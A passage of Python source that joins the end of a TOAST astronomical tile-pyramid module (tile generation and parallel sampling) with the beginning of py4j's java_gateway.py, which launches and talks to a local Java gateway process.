    y = tile.pos.y * 2
    return [
        Tile(Pos(n=n, x=x, y=y), (ul, top, center, left), increasing),
        Tile(Pos(n=n, x=x + 1, y=y), (top, ur, right, center), increasing),
        Tile(Pos(n=n, x=x, y=y + 1), (left, center, bottom, ll), increasing),
        Tile(Pos(n=n, x=x + 1, y=y + 1), (center, right, lr, bottom), increasing),
    ]
def create_single_tile(pos, coordsys=ToastCoordinateSystem.ASTRONOMICAL):
    """
    Create a single TOAST tile.

    Parameters
    ----------
    pos : :class:`~toasty.pyramid.Pos`
        The position of the tile that will be created. The depth of the
        tile must be at least 1.
    coordsys : optional :class:`ToastCoordinateSystem`
        The TOAST coordinate system to use. Default is
        :attr:`ToastCoordinateSystem.ASTRONOMICAL`.

    Returns
    -------
    :class:`Tile`

    Notes
    -----
    This function should only be used for one-off investigations and debugging.
    It is much more efficient to use :func:`generate_tiles` for bulk computations.
    """
    if pos.n == 0:
        raise ValueError('cannot create a Tile for the n=0 tile')
    # Walk down from the four root tiles, at each level selecting the child
    # quadrant indicated by the corresponding bit of the target x/y.
    candidates = _create_level1_tiles(coordsys)
    for level in range(1, pos.n + 1):
        shift = pos.n - level
        ix = (pos.x >> shift) & 0x1
        iy = (pos.y >> shift) & 0x1
        tile = candidates[iy * 2 + ix]
        if level == pos.n:
            return tile
        candidates = _div4(tile)
def generate_tiles(depth, bottom_only=True, coordsys=ToastCoordinateSystem.ASTRONOMICAL):
    """Generate a pyramid of TOAST tiles in deepest-first order.

    Parameters
    ----------
    depth : int
        The tile depth to recurse to.
    bottom_only : bool
        If True, then only the lowest tiles will be yielded.
    coordsys : optional :class:`ToastCoordinateSystem`
        The TOAST coordinate system to use. Default is
        :attr:`ToastCoordinateSystem.ASTRONOMICAL`.

    Yields
    ------
    tile : Tile
        An individual tile to process. Tiles are yielded deepest-first.
        The ``n = 0`` depth is not included.
    """
    # A filter that accepts everything reduces the filtered generator to
    # plain full-pyramid traversal.
    def _accept_all(tile):
        return True
    return generate_tiles_filtered(depth, _accept_all, bottom_only, coordsys=coordsys)
def generate_tiles_filtered(depth, filter, bottom_only=True, coordsys=ToastCoordinateSystem.ASTRONOMICAL):
    """Generate a pyramid of TOAST tiles in deepest-first order, filtering out subtrees.

    Parameters
    ----------
    depth : int
        The tile depth to recurse to.
    filter : function(Tile)->bool
        A filter function; only tiles for which the function returns True will
        be investigated.
    bottom_only : optional bool
        If True, then only the lowest tiles will be yielded.
    coordsys : optional :class:`ToastCoordinateSystem`
        The TOAST coordinate system to use. Default is
        :attr:`ToastCoordinateSystem.ASTRONOMICAL`.

    Yields
    ------
    tile : Tile
        An individual tile to process. Tiles are yielded deepest-first.
        The ``n = 0`` depth is not included.
    """
    # Traverse each of the four level-1 subtrees in postfix order.
    for root in _create_level1_tiles(coordsys):
        for descendant in _postfix_corner(root, depth, filter, bottom_only):
            yield descendant
def count_tiles_matching_filter(depth, filter, bottom_only=True, coordsys=ToastCoordinateSystem.ASTRONOMICAL):
    """
    Count the number of tiles matching a filter.

    Parameters
    ----------
    depth : int
        The tile depth to recurse to.
    filter : function(Tile)->bool
        A filter function; only tiles for which the function returns True will
        be investigated.
    bottom_only : bool
        If True, then only the lowest tiles will be processed.
    coordsys : optional :class:`ToastCoordinateSystem`
        The TOAST coordinate system to use. Default is
        :attr:`ToastCoordinateSystem.ASTRONOMICAL`.

    Returns
    ------
    The number of tiles matching the filter. Even if ``bottom_only`` is false,
    the ``n = 0`` tile is not counted.

    Notes
    -----
    This function's call signature and tree-exploration semantics match
    :func:`generate_tiles_filtered`.
    """
    # With a generic filter function, brute-force enumeration is the only option.
    matches = generate_tiles_filtered(depth, filter, bottom_only=bottom_only, coordsys=coordsys)
    return sum(1 for _tile in matches)
def sample_layer(
    pio,
    sampler,
    depth,
    coordsys=ToastCoordinateSystem.ASTRONOMICAL,
    format=None,
    parallel=None,
    cli_progress=False,
):
    """Generate a layer of the TOAST tile pyramid through direct sampling.

    Parameters
    ----------
    pio : :class:`toasty.pyramid.PyramidIO`
        Manages the I/O with the tiles in the tile pyramid.
    sampler : callable
        Produces the data for each tile.
    depth : int
        The depth of the layer of the TOAST tile pyramid to generate. Each
        layer holds ``4**depth`` tiles of 256×256 TOAST pixels, so data are
        sampled at a refinement level of ``2**(depth + 8)``.
    coordsys : optional :class:`ToastCoordinateSystem`
        The TOAST coordinate system to use. Default is
        :attr:`ToastCoordinateSystem.ASTRONOMICAL`.
    format : optional :class:`str`
        If provided, overrides the default data storage format of *pio*; one
        of the values in ``toasty.image.SUPPORTED_FORMATS``.
    parallel : integer or None (the default)
        Level of parallelization; None means "use all CPUs". Serial
        processing is forced when fork-based multiprocessing is unavailable;
        pass ``1`` to force it explicitly.
    cli_progress : optional boolean, defaults False
        If true, a tqdm progress bar is printed to the terminal.
    """
    from .par_util import resolve_parallelism
    worker_count = resolve_parallelism(parallel)
    if worker_count > 1:
        _sample_layer_parallel(pio, format, sampler, depth, coordsys, cli_progress, worker_count)
    else:
        _sample_layer_serial(pio, format, sampler, depth, coordsys, cli_progress)
def _sample_layer_serial(pio, format, sampler, depth, coordsys, cli_progress):
    """Serial implementation of sample_layer: one tile at a time."""
    total = tiles_at_depth(depth)
    with tqdm(total=total, disable=not cli_progress) as progress:
        for tile in generate_tiles(depth, bottom_only=True, coordsys=coordsys):
            lon, lat = toast_tile_get_coords(tile)
            img = Image.from_array(sampler(lon, lat))
            pio.write_image(tile.pos, img, format=format)
            progress.update(1)
    if cli_progress:
        # Leave the finished progress bar on its own line.
        print()
def _sample_layer_parallel(pio, format, sampler, depth, coordsys, cli_progress, parallel):
    """Parallel implementation of sample_layer.

    This function acts as the producer, feeding tiles to *parallel* worker
    processes; each worker samples and writes its tiles independently.
    """
    import multiprocessing as mp
    # Set once the producer has enqueued every tile; workers exit when the
    # queue is drained *and* this event is set.
    done_event = mp.Event()
    # Bounded queue so the producer cannot run arbitrarily far ahead.
    queue = mp.Queue(maxsize = 2 * parallel)
    workers = []
    for _ in range(parallel):
        w = mp.Process(target=_mp_sample_worker, args=(queue, done_event, pio, sampler, format))
        w.daemon = True
        w.start()
        workers.append(w)
    # Send out tiles:
    with tqdm(total=tiles_at_depth(depth), disable=not cli_progress) as progress:
        for tile in generate_tiles(depth, bottom_only=True, coordsys=coordsys):
            queue.put(tile)
            progress.update(1)
    # OK, we're done!
    queue.close()
    queue.join_thread()
    done_event.set()
    for w in workers:
        w.join()
    if cli_progress:
        print()
def _mp_sample_worker(queue, done_event, pio, sampler, format):
    """
    Worker-process loop: consume tiles from *queue* until the producer is done.
    """
    from queue import Empty
    while True:
        try:
            tile = queue.get(True, timeout=1)
        except Empty:
            # Quit only once the producer has finished *and* the queue is
            # drained; otherwise keep polling.
            if done_event.is_set():
                break
            continue
        lon, lat = toast_tile_get_coords(tile)
        img = Image.from_array(sampler(lon, lat))
        pio.write_image(tile.pos, img, format=format)
def sample_layer_filtered(
    pio,
    tile_filter,
    sampler,
    depth,
    coordsys=ToastCoordinateSystem.ASTRONOMICAL,
    parallel=None,
    cli_progress=False,
):
    """Populate a subset of a layer of the TOAST tile pyramid through direct sampling.

    Parameters
    ----------
    pio : :class:`toasty.pyramid.PyramidIO`
        Manages the I/O with the tiles in the tile pyramid.
    tile_filter : callable
        A tile filtering function, suitable for passing to
        :func:`toasty.toast.generate_tiles_filtered`.
    sampler : callable
        Produces the data for each tile.
    depth : int
        The depth of the layer of the TOAST tile pyramid to generate. Each
        layer holds ``4**depth`` tiles of 256×256 TOAST pixels, so data are
        sampled at a refinement level of ``2**(depth + 8)``.
    coordsys : optional :class:`ToastCoordinateSystem`
        The TOAST coordinate system to use. Default is
        :attr:`ToastCoordinateSystem.ASTRONOMICAL`.
    parallel : integer or None (the default)
        Level of parallelization; None means "use all CPUs". Serial
        processing is forced when fork-based multiprocessing is unavailable;
        pass ``1`` to force it explicitly.
    cli_progress : optional boolean, defaults False
        If true, a tqdm progress bar is printed to the terminal.
    """
    from .par_util import resolve_parallelism
    worker_count = resolve_parallelism(parallel)
    if worker_count > 1:
        _sample_filtered_parallel(pio, tile_filter, sampler, depth, coordsys, cli_progress, worker_count)
    else:
        _sample_filtered_serial(pio, tile_filter, sampler, depth, coordsys, cli_progress)
def _sample_filtered_serial(pio, tile_filter, sampler, depth, coordsys, cli_progress):
    """Serial implementation of sample_layer_filtered.

    Unlike the unfiltered serial path, tiles are *merged* into any existing
    data via update_image rather than overwritten.
    """
    # Pre-count matching tiles so tqdm can show an accurate total.
    n_todo = count_tiles_matching_filter(depth, tile_filter, bottom_only=True, coordsys=coordsys)
    full = slice(None)
    with tqdm(total=n_todo, disable=not cli_progress) as progress:
        for tile in generate_tiles_filtered(depth, tile_filter, bottom_only=True, coordsys=coordsys):
            lon, lat = toast_tile_get_coords(tile)
            img = Image.from_array(sampler(lon, lat))
            with pio.update_image(tile.pos, masked_mode=img.mode, default='masked') as basis:
                img.update_into_maskable_buffer(basis, full, full, full, full)
            progress.update(1)
    if cli_progress:
        print()
    # do not clean lockfiles, for HPC contexts where we're processing different
    # chunks in parallel.
def _sample_filtered_parallel(pio, tile_filter, sampler, depth, coordsys, cli_progress, parallel):
    """Parallel implementation of sample_layer_filtered.

    Same producer/consumer scheme as _sample_layer_parallel, except that the
    matching tiles are counted up front for the progress bar and the workers
    merge into existing tiles instead of overwriting them.
    """
    import multiprocessing as mp
    # Pre-count so tqdm can display an accurate total.
    n_todo = count_tiles_matching_filter(depth, tile_filter, bottom_only=True, coordsys=coordsys)
    # Set once every tile has been enqueued; workers exit when the queue is
    # drained *and* this event is set.
    done_event = mp.Event()
    # Bounded queue so the producer cannot run arbitrarily far ahead.
    queue = mp.Queue(maxsize = 2 * parallel)
    workers = []
    for _ in range(parallel):
        w = mp.Process(target=_mp_sample_filtered, args=(queue, done_event, pio, sampler))
        w.daemon = True
        w.start()
        workers.append(w)
    # Here we go:
    with tqdm(total=n_todo, disable=not cli_progress) as progress:
        for tile in generate_tiles_filtered(depth, tile_filter, bottom_only=True, coordsys=coordsys):
            queue.put(tile)
            progress.update(1)
    # OK, we're done!
    queue.close()
    queue.join_thread()
    done_event.set()
    for w in workers:
        w.join()
    if cli_progress:
        print()
    # do not clean lockfiles, for HPC contexts where we're processing different
    # chunks in parallel.
def _mp_sample_filtered(queue, done_event, pio, sampler):
    """
    Worker-process loop for the filtered sampler.

    We use ``pio.update_image`` in case we are in an HPC-type context where
    other chunks may be trying to populate the same tiles as us at the same
    time.
    """
    from queue import Empty
    full = slice(None)
    while True:
        try:
            tile = queue.get(True, timeout=1)
        except Empty:
            # Quit only once the producer has finished *and* the queue is
            # drained; otherwise keep polling.
            if done_event.is_set():
                break
            continue
        lon, lat = toast_tile_get_coords(tile)
        img = Image.from_array(sampler(lon, lat))
        with pio.update_image(tile.pos, masked_mode=img.mode, default='masked') as basis:
            img.update_into_maskable_buffer(basis, full, full, full, full)
|
java_gateway.py | # -*- coding: UTF-8 -*-
"""Module to interact with objects in a Java Virtual Machine from a
Python Virtual Machine.
Variables that might clash with the JVM start with an underscore
(Java Naming Convention do not recommend to start with an underscore
so clashes become unlikely).
Created on Dec 3, 2009
:author: Barthelemy Dagenais
"""
from __future__ import unicode_literals, absolute_import
from collections import deque
import logging
import os
from pydoc import pager
import select
import socket
import struct
from subprocess import Popen, PIPE
import subprocess
import sys
import traceback
from threading import Thread, RLock
import weakref
from py4j.compat import (
range, hasattr2, basestring, CompatThread, Queue)
from py4j.finalizer import ThreadSafeFinalizer
from py4j import protocol as proto
from py4j.protocol import (
Py4JError, Py4JJavaError, Py4JNetworkError,
Py4JAuthenticationError,
get_command_part, get_return_value,
register_output_converter, smart_decode, escape_new_line,
is_fatal_error, is_error, unescape_new_line,
get_error_message, compute_exception_message)
from py4j.signals import Signal
from py4j.version import __version__
class NullHandler(logging.Handler):
    """A logging handler that silently discards every record."""
    def emit(self, record):
        # Intentionally a no-op.
        pass
# Attach the no-op handler so that py4j produces no "no handlers could be
# found" warning when the host application configures no logging.
null_handler = NullHandler()
logging.getLogger("py4j").addHandler(null_handler)
# Module-level logger used throughout this file.
logger = logging.getLogger("py4j.java_gateway")
# Default network parameters for talking to the JVM.
BUFFER_SIZE = 4096
DEFAULT_ADDRESS = "127.0.0.1"
DEFAULT_PORT = 25333
DEFAULT_PYTHON_PROXY_PORT = 25334
# Sentinel meaning "use the module-level default accept timeout".
DEFAULT_ACCEPT_TIMEOUT_PLACEHOLDER = "DEFAULT"
# May be overridden via set_default_callback_accept_timeout (deprecated).
DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT = 5
# Environment-variable name, presumably toggling collection conversion --
# its consumer is elsewhere in this module.
PY4J_SKIP_COLLECTIONS = "PY4J_SKIP_COLLECTIONS"
# String values of that variable interpreted as "true".
PY4J_TRUE = {"yes", "y", "t", "true"}
# ---------------------------------------------------------------------------
# Module-level signals fired around the lifecycle of the Python (callback)
# server; receivers connect through py4j.signals.Signal.
# ---------------------------------------------------------------------------
server_connection_stopped = Signal()
"""Signal sent when a Python (Callback) Server connection is stopped.
Will supply the ``connection`` argument, an instance of CallbackConnection.
The sender is the CallbackServer instance.
"""
server_connection_started = Signal()
"""Signal sent when a Python (Callback) Server connection is started.
Will supply the ``connection`` argument, an instance of CallbackConnection.
The sender is the CallbackServer instance.
"""
server_connection_error = Signal()
"""Signal sent when a Python (Callback) Server encounters an error while
waiting for a connection.
Will supply the ``error`` argument, an instance of Exception.
The sender is the CallbackServer instance.
"""
server_started = Signal()
"""Signal sent when a Python (Callback) Server is started
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
server_stopped = Signal()
"""Signal sent when a Python (Callback) Server is stopped
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
pre_server_shutdown = Signal()
"""Signal sent when a Python (Callback) Server is about to shut down.
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
post_server_shutdown = Signal()
"""Signal sent when a Python (Callback) Server is shutted down.
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
def get_create_new_process_group_kwargs():
    """Return Popen kwargs that start the child in its own process group.

    Keeping the JVM in a separate group prevents signals such as SIGINT
    from propagating to it.
    """
    if os.name == "nt":
        return {"creationflags": subprocess.CREATE_NEW_PROCESS_GROUP}
    # POSIX: detach into a new process group before exec.
    return {"preexec_fn": os.setpgrp}
def set_reuse_address(server_socket):
    """Enable SO_REUSEADDR on *server_socket*, except on Windows.

    On Windows the SO_REUSEADDR option means that multiple server sockets
    can be bound to the same address (it has nothing to do with TIME_WAIT),
    so it is deliberately skipped there.
    """
    if os.name == "nt":
        return
    server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
def set_default_callback_accept_timeout(accept_timeout):
    """Set the module-wide default accept timeout of the callback server.

    Deprecated: pass the timeout through CallbackServerParameters instead.
    """
    deprecated("set_default_callback_accept_timeout", "1.0",
               "CallbackServerParameters")
    global DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT
    DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT = accept_timeout
def deprecated(name, last_version, use_instead="", level=logging.DEBUG,
               raise_exc=False):
    """Logs (and optionally raises) a deprecation message for ``name``.

    :param name: the deprecated API's name.
    :param last_version: the version in which the API will be removed.
    :param use_instead: the recommended replacement, if any.
    :param level: logging level used for the message.
    :param raise_exc: if True, also raises a DeprecationWarning.
    """
    msg = "{0} is deprecated and will be removed in version {1}".format(
        name, last_version)
    if use_instead:
        msg += ". Use {0} instead.".format(use_instead)
    logger.log(level, msg)
    if raise_exc:
        raise DeprecationWarning(msg)
def java_import(jvm_view, import_str):
    """Imports the package or class specified by `import_str` in the
    jvm view namespace.

    :param jvm_view: The jvm_view in which to import a class/package.
    :param import_str: The class (e.g., java.util.List) or the package
        (e.g., java.io.*) to import
    """
    client = jvm_view._gateway_client
    # Protocol frame: command name, sub-command, view id, import string,
    # and the END marker, newline separated.
    command = "".join([
        proto.JVMVIEW_COMMAND_NAME,
        proto.JVM_IMPORT_SUB_COMMAND_NAME,
        jvm_view._id,
        "\n",
        escape_new_line(import_str),
        "\n",
        proto.END_COMMAND_PART,
    ])
    answer = client.send_command(command)
    return get_return_value(answer, client, None, None)
def find_jar_path():
    """Tries to find the path where the py4j jar is located.

    Returns the first existing candidate path, or an empty string if the
    jar cannot be found.
    """
    jar_file = "py4j{0}.jar".format(__version__)
    maven_jar_file = "py4j-{0}.jar".format(__version__)
    here = os.path.dirname(os.path.realpath(__file__))
    candidates = [
        jar_file,
        # ant build output
        os.path.join(here, "../../../py4j-java/" + jar_file),
        # maven build output
        os.path.join(here, "../../../py4j-java/target/" + maven_jar_file),
        os.path.join(here, "../share/py4j/" + jar_file),
        "../../../current-release/" + jar_file,
        os.path.join(sys.prefix, "share/py4j/" + jar_file),
        # pip install py4j (system or --user): this module lives in
        # virtualenvpath/lib/pythonX/{dist,site}-packages/py4j/ while the
        # jar is installed under virtualenvpath/share/py4j/.
        os.path.join(here, "../../../../share/py4j/" + jar_file),
    ]
    for candidate in candidates:
        if os.path.exists(candidate):
            return candidate
    return ""
def launch_gateway(port=0, jarpath="", classpath="", javaopts=None,
                   die_on_exit=False, redirect_stdout=None,
                   redirect_stderr=None, daemonize_redirect=True,
                   java_path="java", create_new_process_group=False,
                   enable_auth=False):
    """Launch a `Gateway` in a new Java process.

    The redirect parameters accept file-like objects, Queue, or deque. When
    text lines are sent to the stdout or stderr of the child JVM, these lines
    are redirected to the file-like object (``write(line)``), the Queue
    (``put(line)``), or the deque (``appendleft(line)``).

    The text line will contain a newline character.

    Only text output is accepted on stdout and stderr. If you wish to
    communicate with the child JVM through bytes, you need to create your own
    helper function.

    :param port: the port to launch the Java Gateway on. If no port is
        specified then an ephemeral port is used.
    :param jarpath: the path to the Py4J jar. Only necessary if the jar
        was installed at a non-standard location or if Python is using
        a different `sys.prefix` than the one that Py4J was installed
        under.
    :param classpath: the classpath used to launch the Java Gateway.
    :param javaopts: an optional list of extra options to pass to Java (the
        classpath should be specified using the `classpath` parameter,
        not `javaopts`.) Defaults to no extra options.
    :param die_on_exit: if `True`, the Java gateway process will die when
        this Python process exits or is killed.
    :param redirect_stdout: where to redirect the JVM stdout. If None (default)
        stdout is redirected to os.devnull. Otherwise accepts a
        file descriptor, a queue, or a deque. Will send one line at a time
        to these objects.
    :param redirect_stderr: where to redirect the JVM stdout. If None (default)
        stderr is redirected to os.devnull. Otherwise accepts a
        file descriptor, a queue, or a deque. Will send one line at a time to
        these objects.
    :param daemonize_redirect: if True, the consumer threads will be daemonized
        and will not prevent the main Python process from exiting. This means
        the file descriptors (stderr, stdout, redirect_stderr, redirect_stdout)
        might not be properly closed. This is not usually a problem, but in
        case of errors related to file descriptors, set this flag to False.
    :param java_path: If None, Py4J will use $JAVA_HOME/bin/java if $JAVA_HOME
        is defined, otherwise it will use "java".
    :param create_new_process_group: If True, the JVM is started in a new
        process group. This ensures that signals sent to the parent Python
        process are not forwarded to the JVM. For example, sending
        Ctrl-C/SIGINT won't interrupt the JVM. If the python process dies, the
        Java process will stay alive, which may be a problem for some scenarios
        though.
    :param enable_auth: If True, the server will require clients to provide an
        authentication token when connecting.

    :rtype: the port number of the `Gateway` server or, when auth enabled,
        a 2-tuple with the port number and the auth token.
    """
    popen_kwargs = {}
    # Fix: use a None sentinel instead of a mutable default argument
    # (``javaopts=[]``), which would be shared across all calls.
    if javaopts is None:
        javaopts = []
    if not jarpath:
        jarpath = find_jar_path()

    if not java_path:
        java_home = os.environ.get("JAVA_HOME")
        if java_home:
            java_path = os.path.join(java_home, "bin", "java")
        else:
            java_path = "java"

    # Fail if the jar does not exist.
    if not os.path.exists(jarpath):
        raise Py4JError("Could not find py4j jar at {0}".format(jarpath))

    # Launch the server in a subprocess.
    classpath = os.pathsep.join((jarpath, classpath))
    command = [java_path, "-classpath", classpath] + javaopts + \
        ["py4j.GatewayServer"]
    if die_on_exit:
        command.append("--die-on-broken-pipe")
    if enable_auth:
        command.append("--enable-auth")
    command.append(str(port))
    logger.debug("Launching gateway with command {0}".format(command))

    # stderr redirection
    close_stderr = False
    if redirect_stderr is None:
        stderr = open(os.devnull, "w")
        close_stderr = True
    elif isinstance(redirect_stderr, Queue) or\
            isinstance(redirect_stderr, deque):
        stderr = PIPE
    else:
        stderr = redirect_stderr
        # we don't need this anymore
        redirect_stderr = None

    # stdout redirection
    if redirect_stdout is None:
        redirect_stdout = open(os.devnull, "w")

    if create_new_process_group:
        popen_kwargs.update(get_create_new_process_group_kwargs())

    proc = Popen(command, stdout=PIPE, stdin=PIPE, stderr=stderr,
                 **popen_kwargs)

    # Determine which port the server started on (needed to support
    # ephemeral ports)
    _port = int(proc.stdout.readline())

    # Read the auth token from the server if enabled.
    _auth_token = None
    if enable_auth:
        # Strip the trailing newline.
        _auth_token = proc.stdout.readline()[:-1]

    # Start consumer threads so process does not deadlock/hangs
    OutputConsumer(
        redirect_stdout, proc.stdout, daemon=daemonize_redirect).start()
    if redirect_stderr is not None:
        OutputConsumer(
            redirect_stderr, proc.stderr, daemon=daemonize_redirect).start()
    ProcessConsumer(proc, [redirect_stdout], daemon=daemonize_redirect).start()

    if close_stderr:
        # XXX This will quiet ResourceWarning in Python 3.5+
        # This only close the fd in this process, not in the JVM process, which
        # makes sense.
        quiet_close(stderr)

    if enable_auth:
        return (_port, _auth_token)
    else:
        return _port
def get_field(java_object, field_name):
    """Retrieves the field named `field_name` from the `java_object`.

    This function is useful when `auto_field=false` in a gateway or
    Java object.

    :param java_object: the instance containing the field
    :param field_name: the name of the field to retrieve
    :raises Py4JError: if the object has no such field or an error occurs.
    """
    client = java_object._gateway_client
    command = "".join([
        proto.FIELD_COMMAND_NAME, proto.FIELD_GET_SUBCOMMAND_NAME,
        java_object._target_id, "\n", field_name, "\n",
        proto.END_COMMAND_PART])
    answer = client.send_command(command)
    has_error, error_message = get_error_message(answer)
    if answer != proto.NO_MEMBER_COMMAND and not has_error:
        return get_return_value(
            answer, client, java_object._target_id, field_name)
    message = compute_exception_message(
        "no field {0} in object {1}".format(
            field_name, java_object._target_id), error_message)
    raise Py4JError(message)
def set_field(java_object, field_name, value):
    """Sets the field named `field_name` of `java_object` to `value`.

    This function is the only way to set a field because the assignment
    operator in Python cannot be overloaded.

    :param java_object: the instance containing the field
    :param field_name: the name of the field to set
    :param value: the value to assign to the field
    :raises Py4JError: if the object has no such field or an error occurs.
    """
    client = java_object._gateway_client
    command_part = get_command_part(value, client.gateway_property.pool)
    command = "".join([
        proto.FIELD_COMMAND_NAME, proto.FIELD_SET_SUBCOMMAND_NAME,
        java_object._target_id, "\n", field_name, "\n",
        command_part, proto.END_COMMAND_PART])
    answer = client.send_command(command)
    has_error, error_message = get_error_message(answer)
    if has_error or answer == proto.NO_MEMBER_COMMAND:
        message = compute_exception_message(
            "no field {0} in object {1}".format(
                field_name, java_object._target_id), error_message)
        raise Py4JError(message)
    return get_return_value(
        answer, client, java_object._target_id, field_name)
def get_method(java_object, method_name):
    """Retrieves a reference to the method of an object.

    This function is useful when `auto_field=true` and an instance field has
    the same name as a method. The full signature of the method is not
    required: it is determined when the method is called.

    :param java_object: the instance containing the method
    :param method_name: the name of the method to retrieve
    """
    target_id = java_object._target_id
    client = java_object._gateway_client
    return JavaMember(method_name, java_object, target_id, client)
def is_instance_of(gateway, java_object, java_class):
    """Indicates whether a java object is an instance of the provided
    java_class.

    :param gateway: the JavaGateway instance
    :param java_object: the JavaObject instance
    :param java_class: can be a string (fully qualified name), a JavaClass
        instance, or a JavaObject instance)
    """
    # Normalize java_class into something TypeUtil.isInstanceOf accepts,
    # before touching the gateway at all.
    if isinstance(java_class, basestring):
        class_param = java_class
    elif isinstance(java_class, JavaClass):
        class_param = java_class._fqn
    elif isinstance(java_class, JavaObject):
        class_param = java_class.getClass()
    else:
        raise Py4JError(
            "java_class must be a string, a JavaClass, or a JavaObject")
    type_util = gateway.jvm.py4j.reflection.TypeUtil
    return type_util.isInstanceOf(class_param, java_object)
def get_java_class(java_class):
    """Returns the java.lang.Class of a JavaClass. This is equivalent to
    calling .class in Java.

    :param java_class: An instance of JavaClass
    :rtype: An instance of JavaObject that corresponds to a java.lang.Class
    """
    return java_class._java_lang_class
def quiet_close(closable):
    """Closes ``closable``, logging (instead of raising) any failure.

    :param closable: Object with a ``close`` method, or ``None`` (no-op).
    """
    if closable is None:
        # Nothing to close; avoids logging a needless exception.
        return
    try:
        closable.close()
    except Exception:
        logger.debug("Exception while closing", exc_info=True)
def quiet_shutdown(socket_instance):
    """Shuts down a socket, logging (instead of raising) any failure.

    :param socket_instance: Socket with ``shutdown`` method, or ``None``
        (no-op).
    """
    if socket_instance is None:
        # Nothing to shut down; avoids logging a needless exception.
        return
    try:
        socket_instance.shutdown(socket.SHUT_RDWR)
    except Exception:
        logger.debug("Exception while shutting down a socket", exc_info=True)
def set_linger(a_socket):
    """Sets SO_LINGER to true, 0 to send a RST packet. This forcibly closes
    the connection and the remote socket should fail on write and should not
    need to read to realize that the socket was closed.

    Only use on timeout and maybe shutdown because it does not terminate the
    TCP connection normally.
    """
    # l_onoff=1 enables lingering; l_linger=0 makes close() send a RST.
    linger_opt = struct.pack(b'ii', 1, 0)
    a_socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, linger_opt)
def check_connection(a_socket, read_timeout):
    """Checks that a socket is ready to receive by reading from it.

    If the read times out, this is a good sign. If the read returns an
    empty string, this usually means that the socket was remotely closed.

    :param a_socket: The socket to read from.
    :param read_timeout: The read_timeout to restore the socket to.
    """
    # Use a near-zero timeout so a healthy idle socket returns immediately.
    a_socket.settimeout(0.0001)
    try:
        try:
            data = a_socket.recv(2)
        except socket.timeout:
            # Expected for a healthy connection: nothing to read.
            data = None
    finally:
        a_socket.settimeout(read_timeout)
    if data == b"":
        raise Exception("The connection was remotely closed.")
def gateway_help(gateway_client, var, pattern=None, short_name=True,
                 display=True):
    """Displays a help page about a class or an object.

    :param gateway_client: The gateway client.
    :param var: JavaObject, JavaClass or JavaMember for which a help page
        will be generated.
    :param pattern: Star-pattern used to filter the members. For example
        "get*Foo" may return getMyFoo, getFoo, getFooBar, but not bargetFoo.
        The pattern is matched against the entire signature. To match only
        the name of a method, use "methodName(*".
    :param short_name: If True, only the simple name of the parameter
        types and return types will be displayed. If False, the fully
        qualified name of the types will be displayed.
    :param display: If True, the help page is displayed in an interactive
        page similar to the `help` command in Python. If False, the page is
        returned as a string.
    """
    if hasattr2(var, "_get_object_id"):
        # Java object instance.
        sub_command = proto.HELP_OBJECT_SUBCOMMAND_NAME
        identifier = var._get_object_id()
    elif hasattr2(var, "_fqn"):
        # Java class.
        sub_command = proto.HELP_CLASS_SUBCOMMAND_NAME
        identifier = var._fqn
    elif hasattr2(var, "container") and hasattr2(var, "name"):
        # Java member: recurse on its container, filtering on the member
        # name so only that method's signatures are shown.
        if pattern is not None:
            raise Py4JError("pattern should be None with var is a JavaMember")
        return gateway_help(
            gateway_client, var.container, var.name + "(*",
            short_name=short_name, display=display)
    else:
        raise Py4JError(
            "var is none of Java Object, Java Class or Java Member")
    command = (proto.HELP_COMMAND_NAME + sub_command +
               identifier + "\n" +
               get_command_part(pattern) +
               get_command_part(short_name) +
               proto.END_COMMAND_PART)
    answer = gateway_client.send_command(command)
    help_page = get_return_value(answer, gateway_client, None, None)
    if display:
        pager(help_page)
    else:
        return help_page
def do_client_auth(command, input_stream, sock, auth_token):
    """Receives and decodes a auth token.

    - If the token does not match, an exception is raised.
    - If the command received is not an Auth command, an exception is raised.
    - If an exception occurs, it is wrapped in a Py4JAuthenticationError.
    - Otherwise, it returns True.

    :param command: the command name already read from ``input_stream``;
        must be the AUTH command.
    :param input_stream: stream positioned right after the command name; the
        next two lines are expected to be the token and the END marker.
    :param sock: the socket on which the success/error response is sent.
    :param auth_token: the expected token value.
    """
    try:
        if command != proto.AUTH_COMMAND_NAME:
            raise Py4JAuthenticationError("Expected {}, received {}.".format(
                proto.AUTH_COMMAND_NAME, command))
        # Strip the trailing newline from the received token.
        client_token = smart_decode(input_stream.readline()[:-1])
        # Remove the END marker
        input_stream.readline()
        if auth_token == client_token:
            success = proto.OUTPUT_VOID_COMMAND.encode("utf-8")
            sock.sendall(success)
        else:
            error = proto.ERROR_RETURN_MESSAGE.encode("utf-8")
            # TODO AUTH Send error message with the error?
            sock.sendall(error)
            raise Py4JAuthenticationError("Client authentication failed.")
    except Py4JAuthenticationError:
        # Already the right exception type: re-raise without wrapping.
        raise
    except Exception as e:
        logger.exception(
            "An exception occurred while trying to authenticate "
            "a connection")
        raise Py4JAuthenticationError(cause=e)
    return True
def _garbage_collect_object(gateway_client, target_id):
    """Weakref callback: tells the Java side that ``target_id`` is no longer
    referenced on the Python side.

    Never raises: it may run during interpreter shutdown.
    """
    try:
        try:
            finalizer_key = (
                smart_decode(gateway_client.address) +
                smart_decode(gateway_client.port) +
                target_id)
            ThreadSafeFinalizer.remove_finalizer(finalizer_key)
            gateway_client.garbage_collect_object(target_id)
        except Exception:
            logger.debug(
                "Exception while garbage collecting an object",
                exc_info=True)
    except Exception:
        # Maybe logger is dead at this point.
        pass
def _garbage_collect_connection(socket_instance):
    """Closes the socket if auto_delete is True and the socket is opened.

    This is an acceptable practice if you know that your Python VM implements
    garbage collection and closing sockets immediately is not a concern.
    Otherwise, it is always better (because it is predictable) to explicitly
    close the socket by calling `GatewayConnection.close()`.
    """
    if socket_instance is None:
        return
    try:
        quiet_shutdown(socket_instance)
        quiet_close(socket_instance)
    except Exception:
        # Maybe logger used by quiet_* is dead at this point
        pass
def _garbage_collect_proxy(pool, proxy_id):
    """Removes a proxy from the pool of python proxies.

